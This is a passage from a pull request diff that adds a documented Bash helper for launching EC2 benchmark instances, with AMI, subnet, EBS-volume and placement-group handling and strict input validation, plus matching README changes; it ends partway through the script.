### PR TITLE
Added aws_create_instance.sh script and tests

### DIFF
--- a/README.md
+++ b/README.md
@@ -10,7 +10,7 @@ A light framework for, and a loose collection of tests, workloads, and repro pac
 1. Provide a unified approach to processing/outputting results, to facilitate meaningful comparisons between setups
 
 ### 1.2 What The Repro Framework DOESN'T Do
-* Manage infrastructure, security, or ACLs (create/delete instances, set up sudo and ssh, configure access and firewall, isolate the network, secure communication, etc)
+* Manage infrastructure, security, or ACLs (create/delete instances, set up sudo and ssh, configure access and firewall, isolate the network, secure communication, etc). The one exception is the optional convenience helper `scripts/aws_create_instance.sh` (see §1.4); it is not part of the framework and is not required to run any repro.
 * Act as a result repository (dashboard, result collection, persistent database, etc)
 * Provide an automation framework (queuing, scheduling, etc)
 * Pick the correct test approach for you (see https://github.com/aws/aws-graviton-getting-started/tree/main/perfrunbook to learn more about that)
@@ -36,6 +36,10 @@ When this is performed, the only mechanism employed (and recommended) is `sudo`,
 ### 1.4 Structure
 
 The repository consists of workloads identified with a unique name (each placed in an eponymous directory under `workloads/`), repro scenarios (all placed under `repros/`), framework files (placed under `common/`), and standalone utilities (placed under `util/`).
+
+Two further directories sit outside the framework proper:
+* `scripts/` - optional convenience helpers that are *not* part of the Repro Framework and are not needed to run any repro. These include `aws_create_instance.sh`, an env-var-driven wrapper around `aws ec2 run-instances` for spinning up a throw-away SUT/LDG instance (see §1.2 - infrastructure management is otherwise out of scope). Run `scripts/aws_create_instance.sh --help` for its options.
+* `tests/` - tests for the above, grouped by type: `tests/unit/` (bats unit tests, run with [bats](https://github.com/bats-core/bats-core); tests mirror the repo layout under `tests/unit/scripts/`, with shared helpers in `tests/unit/helpers/`) and `tests/integration/` (real-AWS end-to-end scripts, run on demand). Run the unit suite with `make unittest`.
 
 ### 1.5 Glossary
 

--- a/scripts/aws_create_instance.sh
+++ b/scripts/aws_create_instance.sh
@@ -1,0 +1,758 @@
+#!/usr/bin/env bash
+#
+# aws_create_instance.sh - Launch an EC2 instance for repro/benchmark work, driven
+# entirely by environment variables. Anything not provided is discovered from
+# the target AWS account (AMI, subnet, security group) when possible.
+# Run with --help to print this documentation.
+#
+# Example:
+#   AWS_PROFILE=database AWS_REGION=us-west-2 INSTANCE_TYPE=m8g.2xlarge \
+#   EBS_DISKS_NUMBER=12 EBS_DISKS_SIZE=1024 EBS_DISKS_TYPE=IO2 EBS_DISKS_IOPS=32000 \
+#   KEYPAIR="mykey" AMI=AL2023_K6.12 EXPNAME=test1 \
+#   scripts/aws_create_instance.sh
+#
+# Environment variables
+# ---------------------
+# Required:
+#   INSTANCE_TYPE       EC2 instance type, e.g. m8g.2xlarge
+#   KEYPAIR             Name of the EC2 key pair to attach (SSH login)
+#   EXPNAME             Experiment name; used in the instance Name tag
+#
+# AMI selection (one of):
+#   AMI                 Either an "ami-..." id (used verbatim) or an alias:
+#                         AL2023_K6.12  AL2023_K6.1  AL2023 (latest)
+#                         UBUNTU2404 UBUNTU2204 UBUNTU2004
+#                       If unset, defaults to the latest AL2023 for the arch.
+#                       The alias also selects the SSH login user (Ubuntu ->
+#                       ubuntu, otherwise ec2-user); the root volume device
+#                       name is read from the AMI itself.
+#
+# EBS data disks (all optional; no data disks if EBS_DISKS_NUMBER unset/0):
+#   EBS_DISKS_NUMBER    Number of extra data volumes, 0..25 (default 0)
+#   EBS_DISKS_SIZE      Size in GiB of each data volume (default 1024)
+#   EBS_DISKS_TYPE      gp3 | gp2 | io1 | io2 | st1 | sc1 (default gp3)
+#   EBS_DISKS_IOPS      Provisioned IOPS, io1/io2/gp3 (default 3000 gp3, 16000 io*)
+#   EBS_DISKS_THROUGHPUT  gp3 only, MiB/s (optional)
+#   ROOT_DISK_SIZE      Root volume size in GiB (default 256)
+#   ROOT_DISK_TYPE      Root volume type (default gp3)
+#   ROOT_DISK_IOPS      Provisioned IOPS for the root volume (default 16000 for
+#                       an io1/io2 root; otherwise the EC2 default applies)
+#
+# Networking / placement (auto-discovered from the default VPC if unset):
+#   AWS_REGION          AWS region (falls back to profile/default config)
+#   AWS_PROFILE         AWS CLI profile
+#   SUBNET_ID           Subnet to launch in (default: a subnet in the default VPC)
+#   SG_ID               Security group id (default: the default SG of the VPC
+#                       that owns SUBNET_ID, or the default VPC's default SG
+#                       when no SUBNET_ID is given). NOTE: a VPC default SG
+#                       normally has no tcp/22 ingress, so SSH will not work
+#                       until the SG allows it; prefer an explicit SG_ID that
+#                       permits SSH if you need to log in.
+#   TENANCY             default | dedicated | host (default dedicated)
+#   ARCH                arm64 | x86_64 (default: inferred from instance type)
+#   ASSOCIATE_PUBLIC_IP true | false (default true)
+#   PLACEMENT_GROUP_NAME  If set, the instance is launched into this placement
+#                       group. If the group does not exist it is created first
+#                       (strategy PLACEMENT_GROUP_STRATEGY, default cluster). A
+#                       cluster group pins all members to one subnet/AZ: the
+#                       subnet is reused from the resource JSON when known, and
+#                       the chosen subnet/AZ is recorded on the first launch.
+#   PLACEMENT_GROUP_STRATEGY  cluster | partition | spread (default cluster);
+#                       only used when the group has to be created.
+#   PLACEMENT_GROUP_PARTITION_COUNT  partitions when creating a partition group
+#                       (default 2)
+#
+# Tagging:
+#   OWNER_TAG           Value of the Owner tag on the instance and any created
+#                       placement group (default: output of whoami)
+#
+# Resource tracking (default on):
+#   SAVE_RESOURCES      true | false (default true) - record the launched instance
+#                       (id, type, subnet/AZ, IPs, placement group) to JSON so a
+#                       follow-up run can query and reuse the values.
+#   RESOURCE_FILE       JSON path (default repro-results/${EXPNAME}.resources.json)
+#
+# Repo bootstrap (clones repro-collection into the login user's home at boot):
+#   CLONE_REPO          true | false (default true)
+#   REPO_URL            git URL (default https://github.com/aws/repro-collection.git).
+#                       Must be anonymously clonable: the instance clones with no
+#                       credentials, and a failed clone is only visible in
+#                       /var/log/cloud-init-output.log on the instance.
+#   REPO_DEST_NAME      clone directory name under ~ (default repro-collection)
+#   REPO_BRANCH         optional branch/tag to check out (default: repo default)
+#
+# Behaviour:
+#   DRYRUN=true         Print/validate the run-instances call without launching
+#                       (nothing is created, including a missing placement group)
+#   NO_WAIT=true        Do not wait for the instance to reach "running"
+#
+set -euo pipefail
+
+# --------------------------------------------------------------------------
+# Helpers
+# --------------------------------------------------------------------------
+err()  { printf '\033[31m[ERROR]\033[0m %s\n' "$*" >&2; }
+info() { printf '\033[36m[INFO ]\033[0m %s\n'  "$*" >&2; }
+warn() { printf '\033[33m[WARN ]\033[0m %s\n'  "$*" >&2; }
+die()  { err "$*"; exit 1; }
+
+# aws wrapper: injects --region/--profile only when set, and never uses a pager.
+aws_cli() {
+    local extra=()
+    [ -n "${AWS_REGION:-}"  ] && extra+=(--region  "${AWS_REGION}")
+    [ -n "${AWS_PROFILE:-}" ] && extra+=(--profile "${AWS_PROFILE}")
+    command aws "${extra[@]}" --no-cli-pager "$@"
+}
+
+# require_aws_value <value> <error message> - reject empty output and the
+# "None" sentinel that `--output text` emits for a missing field.
+require_aws_value() {
+    [ -n "$1" ] && [ "$1" != "None" ] || die "$2"
+}
+
+json_get() {  # $1 = jq filter; echoes "" if file/key absent
+    [ -f "${RESOURCE_FILE}" ] || return 0
+    command -v jq >/dev/null 2>&1 || return 0
+    local v; v="$(jq -r "$1 // empty" "${RESOURCE_FILE}" 2>/dev/null || true)"
+    printf '%s' "${v}"
+}
+
+# Merge a jq expression into RESOURCE_FILE (creating it as {} if needed). The
+# jq program in $1 receives the current doc as '.'; extra args after $1 are
+# passed through to jq verbatim (e.g. --arg name value).
+json_merge() {
+    [ "${SAVE_RESOURCES}" = "true" ] || return 0
+    local prog="$1"; shift
+    local f="${RESOURCE_FILE}" tmp
+    mkdir -p "$(dirname "${f}")"
+    [ -f "${f}" ] || printf '{}\n' > "${f}"
+    tmp="$(mktemp)"
+    if jq "$@" "${prog}" "${f}" > "${tmp}" 2>/dev/null; then
+        mv "${tmp}" "${f}"
+    else
+        rm -f "${tmp}"; warn "Failed to update resource JSON ${f}"; return 1
+    fi
+}
+
+# --------------------------------------------------------------------------
+# Arguments: this script is configured via environment variables; the only
+# accepted argument is -h/--help, which prints the header documentation.
+# --------------------------------------------------------------------------
+# Print the header doc block: every comment line after the shebang, stopping at
+# the first non-comment line. Depends only on comment structure, not on the
+# exact text of any code line below.
+usage() {
+    local line
+    while IFS= read -r line; do
+        case "${line}" in
+            '#!'*) continue ;;      # shebang
+            '#') printf '\n' ;;     # blank comment line
+            '# '*) printf '%s\n' "${line#\# }" ;;
+            '#'*)  printf '%s\n' "${line#\#}" ;;
+            *) break ;;             # first non-comment line ends the header
+        esac
+    done < "$0"
+}
+case "${1:-}" in
+    "")        ;;
+    -h|--help) usage; exit 0 ;;
+    *)         die "Unexpected argument '$1'. This script is configured via environment variables; run --help." ;;
+esac
+
+command -v aws >/dev/null 2>&1 || die "aws CLI not found in PATH"
+
+# --------------------------------------------------------------------------
+# Required inputs
+# --------------------------------------------------------------------------
+: "${INSTANCE_TYPE:?Set INSTANCE_TYPE (e.g. m8g.2xlarge)}"
+: "${KEYPAIR:?Set KEYPAIR (EC2 key pair name)}"
+: "${EXPNAME:?Set EXPNAME (experiment name used in the Name tag)}"
+
+# --------------------------------------------------------------------------
+# Defaults
+# --------------------------------------------------------------------------
+EBS_DISKS_NUMBER="${EBS_DISKS_NUMBER:-0}"
+EBS_DISKS_SIZE="${EBS_DISKS_SIZE:-1024}"
+EBS_DISKS_TYPE="${EBS_DISKS_TYPE:-gp3}"
+EBS_DISKS_IOPS="${EBS_DISKS_IOPS:-}"
+EBS_DISKS_THROUGHPUT="${EBS_DISKS_THROUGHPUT:-}"
+ROOT_DISK_SIZE="${ROOT_DISK_SIZE:-256}"
+ROOT_DISK_TYPE="${ROOT_DISK_TYPE:-gp3}"
+ROOT_DISK_IOPS="${ROOT_DISK_IOPS:-}"
+TENANCY="${TENANCY:-dedicated}"
+ASSOCIATE_PUBLIC_IP="${ASSOCIATE_PUBLIC_IP:-true}"
+OWNER_TAG="${OWNER_TAG:-$(whoami)}"
+CLONE_REPO="${CLONE_REPO:-true}"
+REPO_URL="${REPO_URL:-https://github.com/aws/repro-collection.git}"
+REPO_DEST_NAME="${REPO_DEST_NAME:-repro-collection}"
+REPO_BRANCH="${REPO_BRANCH:-}"
+PLACEMENT_GROUP_NAME="${PLACEMENT_GROUP_NAME:-}"
+PLACEMENT_GROUP_STRATEGY="${PLACEMENT_GROUP_STRATEGY:-cluster}"
+PLACEMENT_GROUP_PARTITION_COUNT="${PLACEMENT_GROUP_PARTITION_COUNT:-2}"
+SAVE_RESOURCES="${SAVE_RESOURCES:-true}"
+RESOURCE_FILE="${RESOURCE_FILE:-repro-results/${EXPNAME}.resources.json}"
+DRYRUN="${DRYRUN:-false}"
+
+# --------------------------------------------------------------------------
+# Input validation
+# --------------------------------------------------------------------------
+# Data-disk device names run /dev/sdb../dev/sdz, so at most 25 extra disks.
+[[ "${EBS_DISKS_NUMBER}" =~ ^[0-9]+$ ]] && [ "${EBS_DISKS_NUMBER}" -le 25 ] \
+    || die "EBS_DISKS_NUMBER must be an integer 0..25 (device names /dev/sdb../dev/sdz), got '${EBS_DISKS_NUMBER}'"
+
+case "${ASSOCIATE_PUBLIC_IP}" in
+    true|false) ;;
+    *) die "ASSOCIATE_PUBLIC_IP must be 'true' or 'false', got '${ASSOCIATE_PUBLIC_IP}'" ;;
+esac
+
+# Numeric disk fields are interpolated unquoted into the block-device JSON, so a
+# non-numeric value would inject/corrupt the request. Required ones must be
+# integers; optional ones (may be empty) must be integers when set.
+require_int()  { [[ "$2" =~ ^[0-9]+$ ]]     || die "$1 must be a non-negative integer, got '$2'"; }
+optional_int() { [ -z "$2" ] || [[ "$2" =~ ^[0-9]+$ ]] || die "$1 must be a non-negative integer when set, got '$2'"; }
+require_int  EBS_DISKS_SIZE       "${EBS_DISKS_SIZE}"
+require_int  ROOT_DISK_SIZE       "${ROOT_DISK_SIZE}"
+optional_int EBS_DISKS_IOPS       "${EBS_DISKS_IOPS}"
+optional_int EBS_DISKS_THROUGHPUT "${EBS_DISKS_THROUGHPUT}"
+optional_int ROOT_DISK_IOPS       "${ROOT_DISK_IOPS}"
+
+# EXPNAME feeds both the instance Name tag and the RESOURCE_FILE path, so keep
+# it free of path separators / shell/JSON metacharacters.
+[[ "${EXPNAME}" =~ ^[A-Za-z0-9._-]+$ ]] \
+    || die "EXPNAME must match ^[A-Za-z0-9._-]+$ (used in a tag and a file path), got '${EXPNAME}'"
+
+# OWNER_TAG and PLACEMENT_GROUP_NAME are interpolated into the tag/placement
+# shorthand strings; restrict them so a value cannot inject extra tag key/values.
+# (The OWNER_TAG pattern allows spaces, so keep it in a variable: an inline
+# regex with a literal space is mis-tokenized by [[ =~ ]].)
+_owner_re='^[A-Za-z0-9._@ -]+$'
+[[ "${OWNER_TAG}" =~ $_owner_re ]] \
+    || die "OWNER_TAG may contain only letters, digits, space, and . _ @ - ; got '${OWNER_TAG}'"
+if [ -n "${PLACEMENT_GROUP_NAME}" ]; then
+    [[ "${PLACEMENT_GROUP_NAME}" =~ ^[A-Za-z0-9._-]+$ ]] \
+        || die "PLACEMENT_GROUP_NAME must match ^[A-Za-z0-9._-]+$, got '${PLACEMENT_GROUP_NAME}'"
+fi
+
+# When SUBNET_ID/SG_ID are supplied they go verbatim into the network-interface
+# JSON; require the canonical id shapes so a crafted value cannot break it.
+[ -z "${SUBNET_ID:-}" ] || [[ "${SUBNET_ID}" =~ ^subnet-[0-9a-f]+$ ]] \
+    || die "SUBNET_ID must look like 'subnet-...', got '${SUBNET_ID}'"
+[ -z "${SG_ID:-}" ] || [[ "${SG_ID}" =~ ^sg-[0-9a-f]+$ ]] \
+    || die "SG_ID must look like 'sg-...', got '${SG_ID}'"
+
+# REPO_* values are interpolated into user-data that runs as root on the
+# instance, so restrict them to a strict character allowlist.
+if [ "${CLONE_REPO}" = "true" ]; then
+    [[ "${REPO_URL}" =~ ^[A-Za-z0-9._:/@+-]+$ ]] \
+        || die "REPO_URL contains characters not allowed in boot user-data: '${REPO_URL}'"
+    { [[ "${REPO_DEST_NAME}" =~ ^[A-Za-z0-9._-]+$ ]] && [ "${REPO_DEST_NAME}" != "." ] && [ "${REPO_DEST_NAME}" != ".." ]; } \
+        || die "REPO_DEST_NAME must match ^[A-Za-z0-9._-]+$ and not be '.' or '..' (no path traversal), got '${REPO_DEST_NAME}'"
+    if [ -n "${REPO_BRANCH}" ]; then
+        [[ "${REPO_BRANCH}" =~ ^[A-Za-z0-9._/-]+$ ]] \
+            || die "REPO_BRANCH must match ^[A-Za-z0-9._/-]+$, got '${REPO_BRANCH}'"
+    fi
+fi
+
+# Resource JSON needs jq; degrade gracefully if it is missing.
+if [ "${SAVE_RESOURCES}" = "true" ] && ! command -v jq >/dev/null 2>&1; then
+    warn "jq not found; disabling resource JSON tracking (SAVE_RESOURCES=false)"
+    SAVE_RESOURCES="false"
+fi
+
+if [ -n "${PLACEMENT_GROUP_NAME}" ]; then
+    case "${PLACEMENT_GROUP_STRATEGY}" in
+        cluster|partition|spread) ;;
+        *) die "Invalid PLACEMENT_GROUP_STRATEGY='${PLACEMENT_GROUP_STRATEGY}'. Use one of: cluster partition spread" ;;
+    esac
+fi
+
+# EBS type -> lowercase for the API (accept IO2, io2, GP3, ...)
+EBS_DISKS_TYPE="$(printf '%s' "${EBS_DISKS_TYPE}" | tr '[:upper:]' '[:lower:]')"
+ROOT_DISK_TYPE="$(printf '%s' "${ROOT_DISK_TYPE}" | tr '[:upper:]' '[:lower:]')"
+
+# Normalize Iops/Throughput per volume type once, here: after this a non-empty
+# value is always valid for its type, so ebs_json emits fields purely on
+# non-emptiness and needs no per-type logic of its own.
+case "${EBS_DISKS_TYPE}" in
+    io1|io2)
+        EBS_DISKS_IOPS="${EBS_DISKS_IOPS:-16000}"
+        [ -n "${EBS_DISKS_THROUGHPUT}" ] && { warn "EBS_DISKS_THROUGHPUT applies only to gp3; ignoring for ${EBS_DISKS_TYPE}"; EBS_DISKS_THROUGHPUT=""; } ;;
+    gp3)
+        EBS_DISKS_IOPS="${EBS_DISKS_IOPS:-3000}" ;;
+    *)
+        [ -n "${EBS_DISKS_IOPS}" ] && warn "EBS_DISKS_IOPS does not apply to ${EBS_DISKS_TYPE}; ignoring it"
+        EBS_DISKS_IOPS=""
+        [ -n "${EBS_DISKS_THROUGHPUT}" ] && { warn "EBS_DISKS_THROUGHPUT applies only to gp3; ignoring for ${EBS_DISKS_TYPE}"; EBS_DISKS_THROUGHPUT=""; } ;;
+esac
+# Root disk: only io1/io2/gp3 accept Iops; anything else rejects the field.
+case "${ROOT_DISK_TYPE}" in
+    io1|io2)
+        # io1 caps at 50 IOPS/GiB; default within that so a default-size io1 root
+        # does not fail the ratio check (io2 tolerates it, but capping is safe).
+        if [ -z "${ROOT_DISK_IOPS}" ]; then
+            ROOT_DISK_IOPS=16000
+            [ "${ROOT_DISK_TYPE}" = "io1" ] && [ $(( 50 * ROOT_DISK_SIZE )) -lt "${ROOT_DISK_IOPS}" ] \
+                && ROOT_DISK_IOPS=$(( 50 * ROOT_DISK_SIZE ))
+        fi ;;
+    gp3) ;;   # optional Iops; keep a user-supplied value, no default
+    *)
+        [ -n "${ROOT_DISK_IOPS}" ] && warn "ROOT_DISK_IOPS does not apply to ${ROOT_DISK_TYPE}; ignoring it"
+        ROOT_DISK_IOPS="" ;;
+esac
+
+# --------------------------------------------------------------------------
+# Architecture: infer from instance type unless ARCH is set.
+# Graviton families end in 'g' before the size (m8g, r8g, c7g, i4g, ...).
+# --------------------------------------------------------------------------
+if [ -z "${ARCH:-}" ]; then
+    family="${INSTANCE_TYPE%%.*}"      # e.g. m8g from m8g.24xlarge
+    if [[ "${family}" =~ g[a-z]*$ ]]; then
+        ARCH="arm64"
+    else
+        ARCH="x86_64"
+    fi
+fi
+info "Architecture: ${ARCH} (instance type ${INSTANCE_TYPE})"
+
+# --------------------------------------------------------------------------
+# Resolve region/account context for the summary.
+# --------------------------------------------------------------------------
+if [ -z "${AWS_REGION:-}" ]; then
+    AWS_REGION="$(command aws configure get region ${AWS_PROFILE:+--profile "$AWS_PROFILE"} 2>/dev/null || true)"
+fi
+[ -n "${AWS_REGION:-}" ] || die "AWS_REGION is not set and no default region is configured"
+
+info "Verifying credentials ..."
+CALLER_ARN="$(aws_cli sts get-caller-identity --query 'Arn' --output text)" \
+    || die "Unable to authenticate with AWS (profile='${AWS_PROFILE:-default}', region='${AWS_REGION}')"
+info "Authenticated as: ${CALLER_ARN}"
+
+# --------------------------------------------------------------------------
+# AMI resolution. Each alias arm also owns its login user, so a new distro
+# alias only needs to be added here (no separate LOGIN_USER case to keep in
+# sync).
+# --------------------------------------------------------------------------
+resolve_ami() {
+    local alias="$1" owners filter
+    LOGIN_USER="ec2-user"
+    case "${alias}" in
+        ami-*) AMI_ID="${alias}"; return 0 ;;
+    esac
+    alias="${alias^^}"     # aliases are case-insensitive
+    case "${alias}" in
+        AL2023_K6.12)
+            owners="137112412989"; filter="al2023-ami-2023*-kernel-6.12-*" ;;
+        AL2023_K6.1)
+            owners="137112412989"; filter="al2023-ami-2023*-kernel-6.1-*" ;;
+        AL2023|"")
+            owners="137112412989"; filter="al2023-ami-2023*-kernel-*" ;;
+        UBUNTU2404)
+            owners="099720109477"; filter="ubuntu/images/hvm-ssd*/ubuntu-noble-24.04-*-server-*"; LOGIN_USER="ubuntu" ;;
+        UBUNTU2204)
+            owners="099720109477"; filter="ubuntu/images/hvm-ssd*/ubuntu-jammy-22.04-*-server-*"; LOGIN_USER="ubuntu" ;;
+        UBUNTU2004)
+            owners="099720109477"; filter="ubuntu/images/hvm-ssd/ubuntu-focal-20.04-*-server-*"; LOGIN_USER="ubuntu" ;;
+        *)
+            die "Unknown AMI alias '$1'. Use an ami-... id or one of: AL2023_K6.12 AL2023_K6.1 AL2023 UBUNTU2404 UBUNTU2204 UBUNTU2004" ;;
+    esac
+
+    info "Resolving AMI: alias='${alias}' owners='${owners}' arch='${ARCH}'"
+    AMI_ID="$(aws_cli ec2 describe-images \
+        --owners ${owners} \
+        --filters "Name=name,Values=${filter}" \
+                  "Name=architecture,Values=${ARCH}" \
+                  "Name=state,Values=available" \
+        --query 'Images | sort_by(@, &CreationDate) | [-1].ImageId' \
+        --output text)"
+    require_aws_value "${AMI_ID}" "No AMI found for alias '$1' (arch ${ARCH}) in ${AWS_REGION}"
+}
+resolve_ami "${AMI:-}"
+info "AMI: ${AMI_ID} (login user ${LOGIN_USER})"
+
+# Root device name differs per AMI (AL2023 /dev/xvda, Ubuntu /dev/sda1). Using
+# the wrong name makes EC2 attach an EXTRA volume and leave the real root at
+# the AMI default size, so read the actual root device from the AMI.
+ROOT_DEVICE="$(aws_cli ec2 describe-images --image-ids "${AMI_ID}" \
+    --query 'Images[0].RootDeviceName' --output text 2>/dev/null || true)"
+if [ -z "${ROOT_DEVICE}" ] || [ "${ROOT_DEVICE}" = "None" ]; then
+    warn "Could not read RootDeviceName of ${AMI_ID}; assuming /dev/xvda"
+    ROOT_DEVICE="/dev/xvda"
+fi
+info "Root device: ${ROOT_DEVICE}"
+
+# --------------------------------------------------------------------------
+# Placement group: ensure it exists (create if missing) and, for a cluster
+# group, keep every member in one subnet/AZ.
+#   1. If the group is missing, create it (default strategy: cluster) - unless
+#      DRYRUN=true, in which case nothing is created.
+#   2. Pick the subnet the group must use, in priority order:
+#        a. explicit SUBNET_ID (validated against any existing members' AZ),
+#        b. the AZ of instances already running in the group (live account),
+#        c. the subnet recorded in the resource JSON (same region only),
+#        d. otherwise the normal discovery below picks one, recorded afterwards.
+# --------------------------------------------------------------------------
+PG_GROUP_ID=""             # set when a placement group is used (for the resource JSON)
+PG_CREATED="false"
+PG_DRYRUN_MISSING="false"  # true when DRYRUN skipped creating a missing group
+if [ -n "${PLACEMENT_GROUP_NAME}" ]; then
+    PG_GROUP_ID="$(aws_cli ec2 describe-placement-groups \
+        --filters "Name=group-name,Values=${PLACEMENT_GROUP_NAME}" \
+        --query 'PlacementGroups[0].GroupId' --output text 2>/dev/null || true)"
+
+    if [ -z "${PG_GROUP_ID}" ] || [ "${PG_GROUP_ID}" = "None" ]; then
+        if [ "${DRYRUN}" = "true" ]; then
+            # A dry run must not mutate the account.
+            info "DRYRUN=true: placement group '${PLACEMENT_GROUP_NAME}' does not exist and would be created (${PLACEMENT_GROUP_STRATEGY}); skipping creation"
+            PG_GROUP_ID=""
+            PG_DRYRUN_MISSING="true"
+        else
+            info "Placement group '${PLACEMENT_GROUP_NAME}' not found; creating (${PLACEMENT_GROUP_STRATEGY}) ..."
+            _pg_create=(ec2 create-placement-group
+                --group-name "${PLACEMENT_GROUP_NAME}"
+                --strategy "${PLACEMENT_GROUP_STRATEGY}"
+                --tag-specifications "ResourceType=placement-group,Tags=[{Key=Name,Value=${PLACEMENT_GROUP_NAME}},{Key=Owner,Value=${OWNER_TAG}}]")
+            [ "${PLACEMENT_GROUP_STRATEGY}" = "partition" ] \
+                && _pg_create+=(--partition-count "${PLACEMENT_GROUP_PARTITION_COUNT}")
+            PG_GROUP_ID="$(aws_cli "${_pg_create[@]}" \
+                --query 'PlacementGroup.GroupId' --output text)"
+            require_aws_value "${PG_GROUP_ID}" "Failed to create placement group '${PLACEMENT_GROUP_NAME}'"
+            info "Created placement group '${PLACEMENT_GROUP_NAME}' (${PG_GROUP_ID})"
+            PG_CREATED="true"
+        fi
+    else
+        info "Placement group '${PLACEMENT_GROUP_NAME}' exists (${PG_GROUP_ID}); reusing"
+    fi
+
+    # Subnet of instances already in the group (so new members share the AZ).
+    PG_MEMBER_SUBNET="$(aws_cli ec2 describe-instances \
+        --filters "Name=placement-group-name,Values=${PLACEMENT_GROUP_NAME}" \
+                  "Name=instance-state-name,Values=pending,running,stopping,stopped" \
+        --query 'Reservations[0].Instances[0].SubnetId' --output text 2>/dev/null || true)"
+    [ "${PG_MEMBER_SUBNET}" = "None" ] && PG_MEMBER_SUBNET=""
+
+    if [ -z "${SUBNET_ID:-}" ]; then
+        if [ -n "${PG_MEMBER_SUBNET}" ]; then
+            SUBNET_ID="${PG_MEMBER_SUBNET}"
+            info "Reusing subnet ${SUBNET_ID} from existing members of '${PLACEMENT_GROUP_NAME}'"
+        else
+            _pg_subnet="$(json_get '.placement_group.subnet_id')"
+            _pg_az="$(json_get '.placement_group.availability_zone')"
+            _rec_region="$(json_get '.region')"
+            # A subnet recorded in another region is useless in this one.
+            if [ -n "${_pg_subnet}" ] && [ -n "${_rec_region}" ] && [ "${_rec_region}" != "${AWS_REGION}" ]; then
+                warn "Resource JSON ${RESOURCE_FILE} was recorded in region ${_rec_region}, not ${AWS_REGION}; ignoring its recorded subnet ${_pg_subnet}"
+                _pg_subnet=""
+            fi
+            if [ -n "${_pg_subnet}" ]; then
+                SUBNET_ID="${_pg_subnet}"
+                info "Reusing subnet ${SUBNET_ID}${_pg_az:+ (AZ ${_pg_az})} recorded for placement group '${PLACEMENT_GROUP_NAME}'"
+            else
+                info "No subnet recorded yet for '${PLACEMENT_GROUP_NAME}'; the chosen subnet/AZ will be recorded for follow-up launches"
+            fi
+        fi
+    elif [ -n "${PG_MEMBER_SUBNET}" ] && [ "${SUBNET_ID}" != "${PG_MEMBER_SUBNET}" ]; then
+        warn "SUBNET_ID=${SUBNET_ID} differs from existing members' subnet ${PG_MEMBER_SUBNET} of '${PLACEMENT_GROUP_NAME}'; a cluster group requires one AZ and the launch may fail"
+    fi
+fi
+
+# --------------------------------------------------------------------------
+# Networking discovery. The VPC is resolved in priority order:
+#   1. from SUBNET_ID when one is provided (works even with no default VPC),
+#   2. otherwise the account's default VPC.
+# The subnet's own VPC also owns its default security group, so a provided
+# SUBNET_ID is enough to fill in a missing SG_ID without any default VPC.
+# --------------------------------------------------------------------------
+VPC_ID=""
+get_vpc() {
+    [ -n "${VPC_ID}" ] && return 0
+    if [ -n "${SUBNET_ID:-}" ]; then
+        VPC_ID="$(aws_cli ec2 describe-subnets \
+            --subnet-ids "${SUBNET_ID}" \
+            --query 'Subnets[0].VpcId' --output text 2>/dev/null || true)"
+        require_aws_value "${VPC_ID}" "Could not resolve VPC for SUBNET_ID=${SUBNET_ID} (check the id and region ${AWS_REGION})"
+        return 0
+    fi
+    VPC_ID="$(aws_cli ec2 describe-vpcs \
+        --filters "Name=isDefault,Values=true" \
+        --query 'Vpcs[0].VpcId' --output text)"
+    require_aws_value "${VPC_ID}" "No default VPC in ${AWS_REGION}; set SUBNET_ID (and optionally SG_ID) explicitly"
+}
+
+if [ -z "${SUBNET_ID:-}" ]; then
+    get_vpc   # default VPC, since no subnet was provided
+    # Pick a random available subnet. Spreading across AZs avoids repeatedly
+    # landing on one AZ that may not offer the requested instance type.
+    mapfile -t _subnets < <(aws_cli ec2 describe-subnets \
+        --filters "Name=vpc-id,Values=${VPC_ID}" "Name=state,Values=available" \
+        --query 'Subnets[].SubnetId' --output text | tr '\t' '\n' | grep -v '^$')
+    [ "${#_subnets[@]}" -gt 0 ] \
+        || die "No available subnet found in default VPC ${VPC_ID}"
+    SUBNET_ID="${_subnets[$(( RANDOM % ${#_subnets[@]} ))]}"
+    info "Discovered subnet: ${SUBNET_ID} (random of ${#_subnets[@]} in default VPC ${VPC_ID})"
+else
+    info "Using provided subnet: ${SUBNET_ID}"
+fi
+
+SG_IS_DEFAULT="false"   # true when SG was auto-discovered (VPC default SG)
+if [ -z "${SG_ID:-}" ]; then
+    get_vpc   # VPC derived from SUBNET_ID (above) or the default VPC
+    SG_ID="$(aws_cli ec2 describe-security-groups \
+        --filters "Name=vpc-id,Values=${VPC_ID}" "Name=group-name,Values=default" \
+        --query 'SecurityGroups[0].GroupId' --output text)"
+    require_aws_value "${SG_ID}" "No default security group found in VPC ${VPC_ID}"
+    SG_IS_DEFAULT="true"
+    info "Discovered security group: ${SG_ID} (default SG of ${VPC_ID})"
+    warn "Using the VPC default SG (${SG_ID}), which normally allows inbound traffic only from itself: SSH to the instance will not work unless it has tcp/22 ingress. Set SG_ID to a group that permits SSH if you need to log in."
+else
+    info "Using provided security group: ${SG_ID}"
+fi
+
+# --------------------------------------------------------------------------
+# Build block device mappings JSON. Iops/Throughput were already normalized
+# per volume type above, so a non-empty value simply means "emit the field".
+# --------------------------------------------------------------------------
+ebs_json() {  # emit one {"DeviceName":...,"Ebs":{...}} object
+    local device="$1" size="$2" type="$3" iops="$4" throughput="$5"
+    local ebs="\"VolumeSize\":${size},\"VolumeType\":\"${type}\",\"DeleteOnTermination\":true"
+    [ -n "${iops}" ]       && ebs="${ebs},\"Iops\":${iops}"
+    [ -n "${throughput}" ] && ebs="${ebs},\"Throughput\":${throughput}"
+    printf '{"DeviceName":"%s","Ebs":{%s}}' "${device}" "${ebs}"
+}
+
+# Data disks use device names /dev/sdb, /dev/sdc, ... (count validated <= 25).
+DISK_LETTERS="bcdefghijklmnopqrstuvwxyz"
+BDM="[$(ebs_json "${ROOT_DEVICE}" "${ROOT_DISK_SIZE}" "${ROOT_DISK_TYPE}" "${ROOT_DISK_IOPS}" "")"
+for (( i = 0; i < EBS_DISKS_NUMBER; i++ )); do
+    dev="/dev/sd${DISK_LETTERS:i:1}"
+    BDM="${BDM},$(ebs_json "${dev}" "${EBS_DISKS_SIZE}" "${EBS_DISKS_TYPE}" "${EBS_DISKS_IOPS}" "${EBS_DISKS_THROUGHPUT}")"
+done
+BDM="${BDM}]"
+
+# --------------------------------------------------------------------------
+# Network interface + user data + tags.
+# --------------------------------------------------------------------------
+NET_IFACE="[{\"DeviceIndex\":0,\"SubnetId\":\"${SUBNET_ID}\",\"Groups\":[\"${SG_ID}\"],\"AssociatePublicIpAddress\":${ASSOCIATE_PUBLIC_IP}}]"
+
+# Base user-data: disable SSM, install common tooling (+git for the repo clone).
